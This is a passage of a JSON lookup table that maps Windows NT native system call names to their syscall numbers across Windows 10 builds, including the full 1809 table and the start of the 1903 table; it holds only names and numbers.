\"NtOpenEnlistment\": 277, \"NtOpenEventPair\": 278, \"NtOpenIoCompletion\": 279, \"NtOpenJobObject\": 280, \"NtOpenKeyEx\": 281, \"NtOpenKeyTransacted\": 282, \"NtOpenKeyTransactedEx\": 283, \"NtOpenKeyedEvent\": 284, \"NtOpenMutant\": 285, \"NtOpenObjectAuditAlarm\": 286, \"NtOpenPartition\": 287, \"NtOpenPrivateNamespace\": 288, \"NtOpenProcessToken\": 289, \"NtOpenRegistryTransaction\": 290, \"NtOpenResourceManager\": 291, \"NtOpenSemaphore\": 292, \"NtOpenSession\": 293, \"NtOpenSymbolicLinkObject\": 294, \"NtOpenThread\": 295, \"NtOpenTimer\": 296, \"NtOpenTransaction\": 297, \"NtOpenTransactionManager\": 298, \"NtPlugPlayControl\": 299, \"NtPrePrepareComplete\": 300, \"NtPrePrepareEnlistment\": 301, \"NtPrepareComplete\": 302, \"NtPrepareEnlistment\": 303, \"NtPrivilegeCheck\": 304, \"NtPrivilegeObjectAuditAlarm\": 305, \"NtPrivilegedServiceAuditAlarm\": 306, \"NtPropagationComplete\": 307, \"NtPropagationFailed\": 308, \"NtPulseEvent\": 309, \"NtQueryAuxiliaryCounterFrequency\": 310, \"NtQueryBootEntryOrder\": 311, \"NtQueryBootOptions\": 312, \"NtQueryDebugFilterState\": 313, \"NtQueryDirectoryFileEx\": 314, \"NtQueryDirectoryObject\": 315, \"NtQueryDriverEntryOrder\": 316, \"NtQueryEaFile\": 317, \"NtQueryFullAttributesFile\": 318, \"NtQueryInformationAtom\": 319, \"NtQueryInformationByName\": 320, \"NtQueryInformationEnlistment\": 321, \"NtQueryInformationJobObject\": 322, \"NtQueryInformationPort\": 323, \"NtQueryInformationResourceManager\": 324, \"NtQueryInformationTransaction\": 325, \"NtQueryInformationTransactionManager\": 326, \"NtQueryInformationWorkerFactory\": 327, \"NtQueryInstallUILanguage\": 328, \"NtQueryIntervalProfile\": 329, \"NtQueryIoCompletion\": 330, \"NtQueryLicenseValue\": 331, \"NtQueryMultipleValueKey\": 332, \"NtQueryMutant\": 333, \"NtQueryOpenSubKeys\": 334, \"NtQueryOpenSubKeysEx\": 335, \"NtQueryPortInformationProcess\": 336, \"NtQueryQuotaInformationFile\": 337, \"NtQuerySecurityAttributesToken\": 338, \"NtQuerySecurityObject\": 339, \"NtQuerySecurityPolicy\": 340, \"NtQuerySemaphore\": 341, \"NtQuerySymbolicLinkObject\": 342, \"NtQuerySystemEnvironmentValue\": 343, \"NtQuerySystemEnvironmentValueEx\": 344, \"NtQuerySystemInformationEx\": 345, \"NtQueryTimerResolution\": 346, \"NtQueryWnfStateData\": 347, \"NtQueryWnfStateNameInformation\": 348, \"NtQueueApcThreadEx\": 349, \"NtRaiseException\": 350, \"NtRaiseHardError\": 351, \"NtReadOnlyEnlistment\": 352, \"NtRecoverEnlistment\": 353, \"NtRecoverResourceManager\": 354, \"NtRecoverTransactionManager\": 355, \"NtRegisterProtocolAddressInformation\": 356, \"NtRegisterThreadTerminatePort\": 357, \"NtReleaseKeyedEvent\": 358, \"NtReleaseWorkerFactoryWorker\": 359, \"NtRemoveIoCompletionEx\": 360, \"NtRemoveProcessDebug\": 361, \"NtRenameKey\": 362, \"NtRenameTransactionManager\": 363, \"NtReplaceKey\": 364, \"NtReplacePartitionUnit\": 365, \"NtReplyWaitReplyPort\": 366, \"NtRequestPort\": 367, \"NtResetEvent\": 368, \"NtResetWriteWatch\": 369, \"NtRestoreKey\": 370, \"NtResumeProcess\": 371, \"NtRevertContainerImpersonation\": 372, \"NtRollbackComplete\": 373, \"NtRollbackEnlistment\": 374, \"NtRollbackRegistryTransaction\": 375, \"NtRollbackTransaction\": 376, \"NtRollforwardTransactionManager\": 377, \"NtSaveKey\": 378, \"NtSaveKeyEx\": 379, \"NtSaveMergedKeys\": 380, \"NtSecureConnectPort\": 381, \"NtSerializeBoot\": 382, \"NtSetBootEntryOrder\": 383, \"NtSetBootOptions\": 384, \"NtSetCachedSigningLevel\": 385, \"NtSetCachedSigningLevel2\": 386, \"NtSetContextThread\": 387, \"NtSetDebugFilterState\": 388, \"NtSetDefaultHardErrorPort\": 389, \"NtSetDefaultLocale\": 390, \"NtSetDefaultUILanguage\": 391, \"NtSetDriverEntryOrder\": 392, \"NtSetEaFile\": 393, \"NtSetHighEventPair\": 394, \"NtSetHighWaitLowEventPair\": 395, \"NtSetIRTimer\": 396, \"NtSetInformationDebugObject\": 397, \"NtSetInformationEnlistment\": 398, \"NtSetInformationJobObject\": 399, \"NtSetInformationKey\": 400, \"NtSetInformationResourceManager\": 401, \"NtSetInformationSymbolicLink\": 402, \"NtSetInformationToken\": 403, \"NtSetInformationTransaction\": 404, \"NtSetInformationTransactionManager\": 405, \"NtSetInformationVirtualMemory\": 406, \"NtSetInformationWorkerFactory\": 407, \"NtSetIntervalProfile\": 408, \"NtSetIoCompletion\": 409, \"NtSetIoCompletionEx\": 410, \"NtSetLdtEntries\": 411, \"NtSetLowEventPair\": 412, \"NtSetLowWaitHighEventPair\": 413, \"NtSetQuotaInformationFile\": 414, \"NtSetSecurityObject\": 415, \"NtSetSystemEnvironmentValue\": 416, \"NtSetSystemEnvironmentValueEx\": 417, \"NtSetSystemInformation\": 418, \"NtSetSystemPowerState\": 419, \"NtSetSystemTime\": 420, \"NtSetThreadExecutionState\": 421, \"NtSetTimer2\": 422, \"NtSetTimerEx\": 423, \"NtSetTimerResolution\": 424, \"NtSetUuidSeed\": 425, \"NtSetVolumeInformationFile\": 426, \"NtSetWnfProcessNotificationEvent\": 427, \"NtShutdownSystem\": 428, \"NtShutdownWorkerFactory\": 429, \"NtSignalAndWaitForSingleObject\": 430, \"NtSinglePhaseReject\": 431, \"NtStartProfile\": 432, \"NtStopProfile\": 433, \"NtSubscribeWnfStateChange\": 434, \"NtSuspendProcess\": 435, \"NtSuspendThread\": 436, \"NtSystemDebugControl\": 437, \"NtTerminateEnclave\": 438, \"NtTerminateJobObject\": 439, \"NtTestAlert\": 440, \"NtThawRegistry\": 441, \"NtThawTransactions\": 442, \"NtTraceControl\": 443, \"NtTranslateFilePath\": 444, \"NtUmsThreadYield\": 445, \"NtUnloadDriver\": 446, \"NtUnloadKey\": 447, \"NtUnloadKey2\": 448, \"NtUnloadKeyEx\": 449, \"NtUnlockFile\": 450, \"NtUnlockVirtualMemory\": 451, \"NtUnmapViewOfSectionEx\": 452, \"NtUnsubscribeWnfStateChange\": 453, \"NtUpdateWnfStateData\": 454, \"NtVdmControl\": 455, \"NtWaitForAlertByThreadId\": 456, \"NtWaitForDebugEvent\": 457, \"NtWaitForKeyedEvent\": 458, \"NtWaitForWorkViaWorkerFactory\": 459, \"NtWaitHighEventPair\": 460, \"NtWaitLowEventPair\": 461}, \"1809\": {\"NtAccessCheck\": 0, \"NtWorkerFactoryWorkerReady\": 1, \"NtAcceptConnectPort\": 2, \"NtMapUserPhysicalPagesScatter\": 3, \"NtWaitForSingleObject\": 4, \"NtCallbackReturn\": 5, \"NtReadFile\": 6, \"NtDeviceIoControlFile\": 7, \"NtWriteFile\": 8, \"NtRemoveIoCompletion\": 9, \"NtReleaseSemaphore\": 10, \"NtReplyWaitReceivePort\": 11, \"NtReplyPort\": 12, \"NtSetInformationThread\": 13, \"NtSetEvent\": 14, \"NtClose\": 15, \"NtQueryObject\": 16, \"NtQueryInformationFile\": 17, \"NtOpenKey\": 18, \"NtEnumerateValueKey\": 19, \"NtFindAtom\": 20, \"NtQueryDefaultLocale\": 21, \"NtQueryKey\": 22, \"NtQueryValueKey\": 23, \"NtAllocateVirtualMemory\": 24, \"NtQueryInformationProcess\": 25, \"NtWaitForMultipleObjects32\": 26, \"NtWriteFileGather\": 27, \"NtSetInformationProcess\": 28, \"NtCreateKey\": 29, \"NtFreeVirtualMemory\": 30, \"NtImpersonateClientOfPort\": 31, \"NtReleaseMutant\": 32, \"NtQueryInformationToken\": 33, \"NtRequestWaitReplyPort\": 34, \"NtQueryVirtualMemory\": 35, \"NtOpenThreadToken\": 36, \"NtQueryInformationThread\": 37, \"NtOpenProcess\": 38, \"NtSetInformationFile\": 39, \"NtMapViewOfSection\": 40, \"NtAccessCheckAndAuditAlarm\": 41, \"NtUnmapViewOfSection\": 42, \"NtReplyWaitReceivePortEx\": 43, \"NtTerminateProcess\": 44, \"NtSetEventBoostPriority\": 45, \"NtReadFileScatter\": 46, \"NtOpenThreadTokenEx\": 47, \"NtOpenProcessTokenEx\": 48, \"NtQueryPerformanceCounter\": 49, \"NtEnumerateKey\": 50, \"NtOpenFile\": 51, \"NtDelayExecution\": 52, \"NtQueryDirectoryFile\": 53, \"NtQuerySystemInformation\": 54, \"NtOpenSection\": 55, \"NtQueryTimer\": 56, \"NtFsControlFile\": 57, \"NtWriteVirtualMemory\": 58, \"NtCloseObjectAuditAlarm\": 59, \"NtDuplicateObject\": 60, \"NtQueryAttributesFile\": 61, \"NtClearEvent\": 62, \"NtReadVirtualMemory\": 63, \"NtOpenEvent\": 64, \"NtAdjustPrivilegesToken\": 65, \"NtDuplicateToken\": 66, \"NtContinue\": 67, \"NtQueryDefaultUILanguage\": 68, \"NtQueueApcThread\": 69, \"NtYieldExecution\": 70, \"NtAddAtom\": 71, \"NtCreateEvent\": 72, \"NtQueryVolumeInformationFile\": 73, \"NtCreateSection\": 74, \"NtFlushBuffersFile\": 75, \"NtApphelpCacheControl\": 76, \"NtCreateProcessEx\": 77, \"NtCreateThread\": 78, \"NtIsProcessInJob\": 79, \"NtProtectVirtualMemory\": 80, \"NtQuerySection\": 81, \"NtResumeThread\": 82, \"NtTerminateThread\": 83, \"NtReadRequestData\": 84, \"NtCreateFile\": 85, \"NtQueryEvent\": 86, \"NtWriteRequestData\": 87, \"NtOpenDirectoryObject\": 88, \"NtAccessCheckByTypeAndAuditAlarm\": 89, \"NtQuerySystemTime\": 90, \"NtWaitForMultipleObjects\": 91, \"NtSetInformationObject\": 92, \"NtCancelIoFile\": 93, \"NtTraceEvent\": 94, \"NtPowerInformation\": 95, \"NtSetValueKey\": 96, \"NtCancelTimer\": 97, \"NtSetTimer\": 98, \"NtAccessCheckByType\": 99, \"NtAccessCheckByTypeResultList\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 101, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 102, \"NtAcquireProcessActivityReference\": 103, \"NtAddAtomEx\": 104, \"NtAddBootEntry\": 105, \"NtAddDriverEntry\": 106, \"NtAdjustGroupsToken\": 107, \"NtAdjustTokenClaimsAndDeviceGroups\": 108, \"NtAlertResumeThread\": 109, \"NtAlertThread\": 110, \"NtAlertThreadByThreadId\": 111, \"NtAllocateLocallyUniqueId\": 112, \"NtAllocateReserveObject\": 113, \"NtAllocateUserPhysicalPages\": 114, \"NtAllocateUuids\": 115, \"NtAllocateVirtualMemoryEx\": 116, \"NtAlpcAcceptConnectPort\": 117, \"NtAlpcCancelMessage\": 118, \"NtAlpcConnectPort\": 119, \"NtAlpcConnectPortEx\": 120, \"NtAlpcCreatePort\": 121, \"NtAlpcCreatePortSection\": 122, \"NtAlpcCreateResourceReserve\": 123, \"NtAlpcCreateSectionView\": 124, \"NtAlpcCreateSecurityContext\": 125, \"NtAlpcDeletePortSection\": 126, \"NtAlpcDeleteResourceReserve\": 127, \"NtAlpcDeleteSectionView\": 128, \"NtAlpcDeleteSecurityContext\": 129, \"NtAlpcDisconnectPort\": 130, \"NtAlpcImpersonateClientContainerOfPort\": 131, \"NtAlpcImpersonateClientOfPort\": 132, \"NtAlpcOpenSenderProcess\": 133, \"NtAlpcOpenSenderThread\": 134, \"NtAlpcQueryInformation\": 135, \"NtAlpcQueryInformationMessage\": 136, \"NtAlpcRevokeSecurityContext\": 137, \"NtAlpcSendWaitReceivePort\": 138, \"NtAlpcSetInformation\": 139, \"NtAreMappedFilesTheSame\": 140, \"NtAssignProcessToJobObject\": 141, \"NtAssociateWaitCompletionPacket\": 142, \"NtCallEnclave\": 143, \"NtCancelIoFileEx\": 144, \"NtCancelSynchronousIoFile\": 145, \"NtCancelTimer2\": 146, \"NtCancelWaitCompletionPacket\": 147, \"NtCommitComplete\": 148, \"NtCommitEnlistment\": 149, \"NtCommitRegistryTransaction\": 150, \"NtCommitTransaction\": 151, \"NtCompactKeys\": 152, \"NtCompareObjects\": 153, \"NtCompareSigningLevels\": 154, \"NtCompareTokens\": 155, \"NtCompleteConnectPort\": 156, \"NtCompressKey\": 157, \"NtConnectPort\": 158, \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\": 159, \"NtCreateDebugObject\": 160, \"NtCreateDirectoryObject\": 161, \"NtCreateDirectoryObjectEx\": 162, \"NtCreateEnclave\": 163, \"NtCreateEnlistment\": 164, \"NtCreateEventPair\": 165, \"NtCreateIRTimer\": 166, \"NtCreateIoCompletion\": 167, \"NtCreateJobObject\": 168, \"NtCreateJobSet\": 169, \"NtCreateKeyTransacted\": 170, \"NtCreateKeyedEvent\": 171, \"NtCreateLowBoxToken\": 172, \"NtCreateMailslotFile\": 173, \"NtCreateMutant\": 174, \"NtCreateNamedPipeFile\": 175, \"NtCreatePagingFile\": 176, \"NtCreatePartition\": 177, \"NtCreatePort\": 178, \"NtCreatePrivateNamespace\": 179, \"NtCreateProcess\": 180, \"NtCreateProfile\": 181, \"NtCreateProfileEx\": 182, \"NtCreateRegistryTransaction\": 183, \"NtCreateResourceManager\": 184, \"NtCreateSectionEx\": 185, \"NtCreateSemaphore\": 186, \"NtCreateSymbolicLinkObject\": 187, \"NtCreateThreadEx\": 188, \"NtCreateTimer\": 189, \"NtCreateTimer2\": 190, \"NtCreateToken\": 191, \"NtCreateTokenEx\": 192, \"NtCreateTransaction\": 193, \"NtCreateTransactionManager\": 194, \"NtCreateUserProcess\": 195, \"NtCreateWaitCompletionPacket\": 196, \"NtCreateWaitablePort\": 197, \"NtCreateWnfStateName\": 198, \"NtCreateWorkerFactory\": 199, \"NtDebugActiveProcess\": 200, \"NtDebugContinue\": 201, \"NtDeleteAtom\": 202, \"NtDeleteBootEntry\": 203, \"NtDeleteDriverEntry\": 204, \"NtDeleteFile\": 205, \"NtDeleteKey\": 206, \"NtDeleteObjectAuditAlarm\": 207, \"NtDeletePrivateNamespace\": 208, \"NtDeleteValueKey\": 209, \"NtDeleteWnfStateData\": 210, \"NtDeleteWnfStateName\": 211, \"NtDisableLastKnownGood\": 212, \"NtDisplayString\": 213, \"NtDrawText\": 214, \"NtEnableLastKnownGood\": 215, \"NtEnumerateBootEntries\": 216, \"NtEnumerateDriverEntries\": 217, \"NtEnumerateSystemEnvironmentValuesEx\": 218, \"NtEnumerateTransactionObject\": 219, \"NtExtendSection\": 220, \"NtFilterBootOption\": 221, \"NtFilterToken\": 222, \"NtFilterTokenEx\": 223, \"NtFlushBuffersFileEx\": 224, \"NtFlushInstallUILanguage\": 225, \"NtFlushInstructionCache\": 226, \"NtFlushKey\": 227, \"NtFlushProcessWriteBuffers\": 228, \"NtFlushVirtualMemory\": 229, \"NtFlushWriteBuffer\": 230, \"NtFreeUserPhysicalPages\": 231, \"NtFreezeRegistry\": 232, \"NtFreezeTransactions\": 233, \"NtGetCachedSigningLevel\": 234, \"NtGetCompleteWnfStateSubscription\": 235, \"NtGetContextThread\": 236, \"NtGetCurrentProcessorNumber\": 237, \"NtGetCurrentProcessorNumberEx\": 238, \"NtGetDevicePowerState\": 239, \"NtGetMUIRegistryInfo\": 240, \"NtGetNextProcess\": 241, \"NtGetNextThread\": 242, \"NtGetNlsSectionPtr\": 243, \"NtGetNotificationResourceManager\": 244, \"NtGetWriteWatch\": 245, \"NtImpersonateAnonymousToken\": 246, \"NtImpersonateThread\": 247, \"NtInitializeEnclave\": 248, \"NtInitializeNlsFiles\": 249, \"NtInitializeRegistry\": 250, \"NtInitiatePowerAction\": 251, \"NtIsSystemResumeAutomatic\": 252, \"NtIsUILanguageComitted\": 253, \"NtListenPort\": 254, \"NtLoadDriver\": 255, \"NtLoadEnclaveData\": 256, \"NtLoadKey\": 257, \"NtLoadKey2\": 258, \"NtLoadKeyEx\": 259, \"NtLockFile\": 260, \"NtLockProductActivationKeys\": 261, \"NtLockRegistryKey\": 262, \"NtLockVirtualMemory\": 263, \"NtMakePermanentObject\": 264, \"NtMakeTemporaryObject\": 265, \"NtManageHotPatch\": 266, \"NtManagePartition\": 267, \"NtMapCMFModule\": 268, \"NtMapUserPhysicalPages\": 269, \"NtMapViewOfSectionEx\": 270, \"NtModifyBootEntry\": 271, \"NtModifyDriverEntry\": 272, \"NtNotifyChangeDirectoryFile\": 273, \"NtNotifyChangeDirectoryFileEx\": 274, \"NtNotifyChangeKey\": 275, \"NtNotifyChangeMultipleKeys\": 276, \"NtNotifyChangeSession\": 277, \"NtOpenEnlistment\": 278, \"NtOpenEventPair\": 279, \"NtOpenIoCompletion\": 280, \"NtOpenJobObject\": 281, \"NtOpenKeyEx\": 282, \"NtOpenKeyTransacted\": 283, \"NtOpenKeyTransactedEx\": 284, \"NtOpenKeyedEvent\": 285, \"NtOpenMutant\": 286, \"NtOpenObjectAuditAlarm\": 287, \"NtOpenPartition\": 288, \"NtOpenPrivateNamespace\": 289, \"NtOpenProcessToken\": 290, \"NtOpenRegistryTransaction\": 291, \"NtOpenResourceManager\": 292, \"NtOpenSemaphore\": 293, \"NtOpenSession\": 294, \"NtOpenSymbolicLinkObject\": 295, \"NtOpenThread\": 296, \"NtOpenTimer\": 297, \"NtOpenTransaction\": 298, \"NtOpenTransactionManager\": 299, \"NtPlugPlayControl\": 300, \"NtPrePrepareComplete\": 301, \"NtPrePrepareEnlistment\": 302, \"NtPrepareComplete\": 303, \"NtPrepareEnlistment\": 304, \"NtPrivilegeCheck\": 305, \"NtPrivilegeObjectAuditAlarm\": 306, \"NtPrivilegedServiceAuditAlarm\": 307, \"NtPropagationComplete\": 308, \"NtPropagationFailed\": 309, \"NtPulseEvent\": 310, \"NtQueryAuxiliaryCounterFrequency\": 311, \"NtQueryBootEntryOrder\": 312, \"NtQueryBootOptions\": 313, \"NtQueryDebugFilterState\": 314, \"NtQueryDirectoryFileEx\": 315, \"NtQueryDirectoryObject\": 316, \"NtQueryDriverEntryOrder\": 317, \"NtQueryEaFile\": 318, \"NtQueryFullAttributesFile\": 319, \"NtQueryInformationAtom\": 320, \"NtQueryInformationByName\": 321, \"NtQueryInformationEnlistment\": 322, \"NtQueryInformationJobObject\": 323, \"NtQueryInformationPort\": 324, \"NtQueryInformationResourceManager\": 325, \"NtQueryInformationTransaction\": 326, \"NtQueryInformationTransactionManager\": 327, \"NtQueryInformationWorkerFactory\": 328, \"NtQueryInstallUILanguage\": 329, \"NtQueryIntervalProfile\": 330, \"NtQueryIoCompletion\": 331, \"NtQueryLicenseValue\": 332, \"NtQueryMultipleValueKey\": 333, \"NtQueryMutant\": 334, \"NtQueryOpenSubKeys\": 335, \"NtQueryOpenSubKeysEx\": 336, \"NtQueryPortInformationProcess\": 337, \"NtQueryQuotaInformationFile\": 338, \"NtQuerySecurityAttributesToken\": 339, \"NtQuerySecurityObject\": 340, \"NtQuerySecurityPolicy\": 341, \"NtQuerySemaphore\": 342, \"NtQuerySymbolicLinkObject\": 343, \"NtQuerySystemEnvironmentValue\": 344, \"NtQuerySystemEnvironmentValueEx\": 345, \"NtQuerySystemInformationEx\": 346, \"NtQueryTimerResolution\": 347, \"NtQueryWnfStateData\": 348, \"NtQueryWnfStateNameInformation\": 349, \"NtQueueApcThreadEx\": 350, \"NtRaiseException\": 351, \"NtRaiseHardError\": 352, \"NtReadOnlyEnlistment\": 353, \"NtRecoverEnlistment\": 354, \"NtRecoverResourceManager\": 355, \"NtRecoverTransactionManager\": 356, \"NtRegisterProtocolAddressInformation\": 357, \"NtRegisterThreadTerminatePort\": 358, \"NtReleaseKeyedEvent\": 359, \"NtReleaseWorkerFactoryWorker\": 360, \"NtRemoveIoCompletionEx\": 361, \"NtRemoveProcessDebug\": 362, \"NtRenameKey\": 363, \"NtRenameTransactionManager\": 364, \"NtReplaceKey\": 365, \"NtReplacePartitionUnit\": 366, \"NtReplyWaitReplyPort\": 367, \"NtRequestPort\": 368, \"NtResetEvent\": 369, \"NtResetWriteWatch\": 370, \"NtRestoreKey\": 371, \"NtResumeProcess\": 372, \"NtRevertContainerImpersonation\": 373, \"NtRollbackComplete\": 374, \"NtRollbackEnlistment\": 375, \"NtRollbackRegistryTransaction\": 376, \"NtRollbackTransaction\": 377, \"NtRollforwardTransactionManager\": 378, \"NtSaveKey\": 379, \"NtSaveKeyEx\": 380, \"NtSaveMergedKeys\": 381, \"NtSecureConnectPort\": 382, \"NtSerializeBoot\": 383, \"NtSetBootEntryOrder\": 384, \"NtSetBootOptions\": 385, \"NtSetCachedSigningLevel\": 386, \"NtSetCachedSigningLevel2\": 387, \"NtSetContextThread\": 388, \"NtSetDebugFilterState\": 389, \"NtSetDefaultHardErrorPort\": 390, \"NtSetDefaultLocale\": 391, \"NtSetDefaultUILanguage\": 392, \"NtSetDriverEntryOrder\": 393, \"NtSetEaFile\": 394, \"NtSetHighEventPair\": 395, \"NtSetHighWaitLowEventPair\": 396, \"NtSetIRTimer\": 397, \"NtSetInformationDebugObject\": 398, \"NtSetInformationEnlistment\": 399, \"NtSetInformationJobObject\": 400, \"NtSetInformationKey\": 401, \"NtSetInformationResourceManager\": 402, \"NtSetInformationSymbolicLink\": 403, \"NtSetInformationToken\": 404, \"NtSetInformationTransaction\": 405, \"NtSetInformationTransactionManager\": 406, \"NtSetInformationVirtualMemory\": 407, \"NtSetInformationWorkerFactory\": 408, \"NtSetIntervalProfile\": 409, \"NtSetIoCompletion\": 410, \"NtSetIoCompletionEx\": 411, \"NtSetLdtEntries\": 412, \"NtSetLowEventPair\": 413, \"NtSetLowWaitHighEventPair\": 414, \"NtSetQuotaInformationFile\": 415, \"NtSetSecurityObject\": 416, \"NtSetSystemEnvironmentValue\": 417, \"NtSetSystemEnvironmentValueEx\": 418, \"NtSetSystemInformation\": 419, \"NtSetSystemPowerState\": 420, \"NtSetSystemTime\": 421, \"NtSetThreadExecutionState\": 422, \"NtSetTimer2\": 423, \"NtSetTimerEx\": 424, \"NtSetTimerResolution\": 425, \"NtSetUuidSeed\": 426, \"NtSetVolumeInformationFile\": 427, \"NtSetWnfProcessNotificationEvent\": 428, \"NtShutdownSystem\": 429, \"NtShutdownWorkerFactory\": 430, \"NtSignalAndWaitForSingleObject\": 431, \"NtSinglePhaseReject\": 432, \"NtStartProfile\": 433, \"NtStopProfile\": 434, \"NtSubscribeWnfStateChange\": 435, \"NtSuspendProcess\": 436, \"NtSuspendThread\": 437, \"NtSystemDebugControl\": 438, \"NtTerminateEnclave\": 439, \"NtTerminateJobObject\": 440, \"NtTestAlert\": 441, \"NtThawRegistry\": 442, \"NtThawTransactions\": 443, \"NtTraceControl\": 444, \"NtTranslateFilePath\": 445, \"NtUmsThreadYield\": 446, \"NtUnloadDriver\": 447, \"NtUnloadKey\": 448, \"NtUnloadKey2\": 449, \"NtUnloadKeyEx\": 450, \"NtUnlockFile\": 451, \"NtUnlockVirtualMemory\": 452, \"NtUnmapViewOfSectionEx\": 453, \"NtUnsubscribeWnfStateChange\": 454, \"NtUpdateWnfStateData\": 455, \"NtVdmControl\": 456, \"NtWaitForAlertByThreadId\": 457, \"NtWaitForDebugEvent\": 458, \"NtWaitForKeyedEvent\": 459, \"NtWaitForWorkViaWorkerFactory\": 460, \"NtWaitHighEventPair\": 461, \"NtWaitLowEventPair\": 462}, \"1903\": {\"NtAccessCheck\": 0, \"NtWorkerFactoryWorkerReady\": 1, \"NtAcceptConnectPort\": 2, \"NtMapUserPhysicalPagesScatter\": 3, \"NtWaitForSingleObject\": 4, \"NtCallbackReturn\": 5, \"NtReadFile\": 6, \"NtDeviceIoControlFile\": 7, \"NtWriteFile\": 8, \"NtRemoveIoCompletion\": 9, \"NtReleaseSemaphore\": 10, \"NtReplyWaitReceivePort\": 11, \"NtReplyPort\": 12, \"NtSetInformationThread\": 13, \"NtSetEvent\": 14, \"NtClose\": 15, \"NtQueryObject\": 16, \"NtQueryInformationFile\": 17, \"NtOpenKey\": 18, \"NtEnumerateValueKey\": 19, \"NtFindAtom\": 20, \"NtQueryDefaultLocale\": 21, \"NtQueryKey\": 22, \"NtQueryValueKey\": 23, \"NtAllocateVirtualMemory\": 24, \"NtQueryInformationProcess\": 25, \"NtWaitForMultipleObjects32\": 26, \"NtWriteFileGather\": 27, \"NtSetInformationProcess\": 28, \"NtCreateKey\": 29, \"NtFreeVirtualMemory\": 30, \"NtImpersonateClientOfPort\": 31, \"NtReleaseMutant\": 32, \"NtQueryInformationToken\": 33, \"NtRequestWaitReplyPort\": 34, \"NtQueryVirtualMemory\": 35, \"NtOpenThreadToken\": 36, \"NtQueryInformationThread\": 37, \"NtOpenProcess\": 38, \"NtSetInformationFile\": 39, \"NtMapViewOfSection\": 40, \"NtAccessCheckAndAuditAlarm\": 41, \"NtUnmapViewOfSection\": 42, \"NtReplyWaitReceivePortEx\": 43, \"NtTerminateProcess\": 44, \"NtSetEventBoostPriority\": 45, \"NtReadFileScatter\": 46, \"NtOpenThreadTokenEx\": 47, \"NtOpenProcessTokenEx\": 48, \"NtQueryPerformanceCounter\": 49, \"NtEnumerateKey\": 50, \"NtOpenFile\": 51, \"NtDelayExecution\": 52, \"NtQueryDirectoryFile\": 53, \"NtQuerySystemInformation\": 54, \"NtOpenSection\": 55, \"NtQueryTimer\": 56, \"NtFsControlFile\": 57, \"NtWriteVirtualMemory\": 58, \"NtCloseObjectAuditAlarm\": 59, \"NtDuplicateObject\": 60, \"NtQueryAttributesFile\": 61, \"NtClearEvent\": 62, \"NtReadVirtualMemory\": 63, \"NtOpenEvent\": 64, \"NtAdjustPrivilegesToken\": 65, \"NtDuplicateToken\": 66, \"NtContinue\": 67, \"NtQueryDefaultUILanguage\": 68, \"NtQueueApcThread\": 69, \"NtYieldExecution\": 70, \"NtAddAtom\": 71, \"NtCreateEvent\": 72, \"NtQueryVolumeInformationFile\": 73, \"NtCreateSection\": 74, \"NtFlushBuffersFile\": 75, \"NtApphelpCacheControl\": 76, \"NtCreateProcessEx\": 77, \"NtCreateThread\": 78, \"NtIsProcessInJob\": 79, \"NtProtectVirtualMemory\": 80, \"NtQuerySection\": 81, \"NtResumeThread\": 82, \"NtTerminateThread\": 83, \"NtReadRequestData\": 84, \"NtCreateFile\": 85, \"NtQueryEvent\": 86, \"NtWriteRequestData\": 87, \"NtOpenDirectoryObject\": 88, \"NtAccessCheckByTypeAndAuditAlarm\": 89, \"NtQuerySystemTime\": 90, \"NtWaitForMultipleObjects\": 91, \"NtSetInformationObject\": 92, \"NtCancelIoFile\": 93, \"NtTraceEvent\": 94, \"NtPowerInformation\": 95, \"NtSetValueKey\": 96, \"NtCancelTimer\": 97, \"NtSetTimer\": 98, \"NtAccessCheckByType\": 99, \"NtAccessCheckByTypeResultList\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 101, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 102, \"NtAcquireProcessActivityReference\": 103, \"NtAddAtomEx\": 104, \"NtAddBootEntry\": 105, \"NtAddDriverEntry\": 106, \"NtAdjustGroupsToken\": 107, \"NtAdjustTokenClaimsAndDeviceGroups\": 108, \"NtAlertResumeThread\": 109, \"NtAlertThread\": 110, \"NtAlertThreadByThreadId\": 111, \"NtAllocateLocallyUniqueId\": 112, \"NtAllocateReserveObject\": 113, \"NtAllocateUserPhysicalPages\": 114, \"NtAllocateUuids\": 115, \"NtAllocateVirtualMemoryEx\": 116, \"NtAlpcAcceptConnectPort\": 117, \"NtAlpcCancelMessage\": 118, \"NtAlpcConnectPort\": 119, \"NtAlpcConnectPortEx\": 120, \"NtAlpcCreatePort\": 121, \"NtAlpcCreatePortSection\": 122, \"NtAlpcCreateResourceReserve\": 123, \"NtAlpcCreateSectionView\": 124, \"NtAlpcCreateSecurityContext\": 125, \"NtAlpcDeletePortSection\": 126, \"NtAlpcDeleteResourceReserve\": 127, \"NtAlpcDeleteSectionView\": 128, \"NtAlpcDeleteSecurityContext\": 129, \"NtAlpcDisconnectPort\": 130, \"NtAlpcImpersonateClientContainerOfPort\": 131, \"NtAlpcImpersonateClientOfPort\": 132, \"NtAlpcOpenSenderProcess\": 133, \"NtAlpcOpenSenderThread\": 134, \"NtAlpcQueryInformation\": 135, \"NtAlpcQueryInformationMessage\": 136, \"NtAlpcRevokeSecurityContext\": 137, \"NtAlpcSendWaitReceivePort\": 138, \"NtAlpcSetInformation\": 139, \"NtAreMappedFilesTheSame\": 140, \"NtAssignProcessToJobObject\": 141, \"NtAssociateWaitCompletionPacket\": 142, \"NtCallEnclave\": 143, \"NtCancelIoFileEx\": 144, \"NtCancelSynchronousIoFile\": 145, \"NtCancelTimer2\": 146, \"NtCancelWaitCompletionPacket\": 147, \"NtCommitComplete\": 148, \"NtCommitEnlistment\": 149, \"NtCommitRegistryTransaction\": 150, \"NtCommitTransaction\": 151, \"NtCompactKeys\": 152, \"NtCompareObjects\": 153, \"NtCompareSigningLevels\": 154, \"NtCompareTokens\": 155, \"NtCompleteConnectPort\": 156, \"NtCompressKey\": 157, \"NtConnectPort\": 158, \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\": 159, \"NtCreateCrossVmEvent\": 160, \"NtCreateDebugObject\": 161, \"NtCreateDirectoryObject\": 162, \"NtCreateDirectoryObjectEx\": 163, \"NtCreateEnclave\": 164, \"NtCreateEnlistment\": 165, \"NtCreateEventPair\": 166, \"NtCreateIRTimer\": 167, \"NtCreateIoCompletion\": 168, \"NtCreateJobObject\": 169, \"NtCreateJobSet\": 170, \"NtCreateKeyTransacted\": 171, \"NtCreateKeyedEvent\": 172, 